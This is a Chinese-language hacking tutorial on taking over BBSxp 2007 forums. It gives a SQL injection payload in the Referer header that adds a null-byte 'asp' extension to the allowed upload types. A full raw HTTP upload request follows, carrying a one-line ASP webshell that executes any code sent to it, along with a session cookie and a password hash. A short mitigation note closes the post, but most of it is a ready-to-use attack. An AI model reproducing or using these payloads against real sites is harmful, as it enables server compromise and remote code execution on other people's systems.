BBSxp 2007 注射漏洞

 

然后你们这个时候可能要说，可以上传SHTML的类型上去哈，服务器肯定支持。
不过好象SHTML上传上去，我也只能去浏览文件的代码。（据说SHTML有时是可以执行CMD命令的，不过当时我是没抱希望，所以就没去试）所以我也就没去实验这个东西。

难道就没有办法了吗？
我想了大概半个小时。最后还真的给我想到了一个办法。

FSO写文件名的时候，如果遇到空字节，那么，这个空字节后面的字符就会被忽略。
比如我们用FSO写一个文件名是：admin%00（空字节).jpg。那么我们实际上写上去的文件名就是admin没有后缀的。
而数据库又刚好是可以存储空字节的数据库。
OK。。。
下面我们构造如下的语句。
Referer: http://bbs.yuzi.net/bank.asp','a','post','cheng');update [BBSXP_SiteSettings] set UpFileTypes=UpFileTypes+'|asp'+char(0)+'a' where 1=1--

然后提交给服务器。
这样服务器就加上了一个允许的类型，这个类型就是'asp空字节a'
呵呵。
然后我们试着提交一下。

POST /PostUpFile.asp? HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://bbs.yuzi.net/PostUpFile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d6215880482
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Host: bbs.yuzi.net
Content-Length: 255
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: bbsxp=bbsxp; skins=xp; ASPSESSIONIDCSBQADBA=HFMDPPMBNDENBBKCAFJLMBMC; UserID=123536; Userpass=7A268B980E0D89FD1C4F498341B32201; Onlinetime=2006%2D11%2D4+23%3A30%3A23; ForumNameList=%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D2%27%3E%u8BBA%u575B%u4EA4%u6D41%u533A%3C/option%3E%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D1%27%3E%u704C%u6C34%u4E50%u56ED%3C/option%3E; Eremite=0; PostTime=2006%2D11%2D5+0%3A42%3A33

-----------------------------7d6215880482
Content-Disposition: form-data; name="file"; filename="E:\muma.asp a"
Content-Type: text/html

 <%If Request("#")<>"" Then Execute(Request("#"))%>
-----------------------------7d6215880482--

这就和动易当年的上传漏洞差不多了。
注意muma.asp a中间的空格要用16进制编辑器改成00就是空字节的意思。

然后发送封包。
就会提示你上传123123123123.asp成功。
找到你上传的文件。
接下来的事就不用我说了吧，哈哈。

我要说明一个问题。
有BBSXP有注入点拿下WEBSHELL的方法不只这一个。
我只是选择了一个我认为最简单的方法。所以各位看官找到更有效果的方法，欢迎你来和我交流
但是不要来批判我，谢谢。

最后说说这个漏洞的修补方法，就是过滤HTTP头文件。不要直接放进数据库。
如果实在修补不了的，请暂时停止其银行功能。
这样就可以有一定效果的防御这个漏洞，等待BBSXP官方出补丁。

后记：最近总是有朋友问我，DVBBS后台怎么拿SHELL。。
看了这个文章后，你有新的想法了吗？